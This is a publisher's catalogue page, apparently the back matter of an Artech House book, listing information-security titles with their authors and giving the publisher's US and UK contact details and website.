Outsourcing Information Security, C. Warren Axelrod
The Penetration Tester’s Guide to Web Applications, Serge Borso
Privacy Protection and Computer Forensics, Second Edition,
Michael A. Caloyannides
Role-Based Access Control, Second Edition, David F. Ferraiolo,
D. Richard Kuhn, and Ramaswamy Chandramouli
Secure Messaging with PGP and S/MIME, Rolf Oppliger
Securing Information and Communications Systems: Principles,
Technologies and Applications, Javier Lopez, Steven Furnell,
Sokratis Katsikas, and Ahmed Patel
Security Fundamentals for E-Commerce, Vesna Hassler
Security Technologies for the World Wide Web, Second Edition,
Rolf Oppliger
Techniques and Applications of Digital Watermarking and Content
Protection, Michael Arnold, Martin Schmucker, and
Stephen D. Wolthusen
User’s Guide to Cryptography and Standards, Alexander W. Dent
and Chris J. Mitchell

For further information on these and other Artech House titles, including previously con-
sidered out-of-print books now available through our In-Print-Forever® (IPF®) program,
contact:

Artech House Artech House


685 Canton Street 16 Sussex Street
Norwood, MA 02062 London SW1V HRW UK
Phone: 781-769-9750 Phone: +44 (0)20 7596-8750
Fax: 781-769-6334 Fax: +44 (0)20 7630-0166
e-mail: [email protected] e-mail: [email protected]
Find us on the World Wide Web at: www.artechhouse.com

You might also like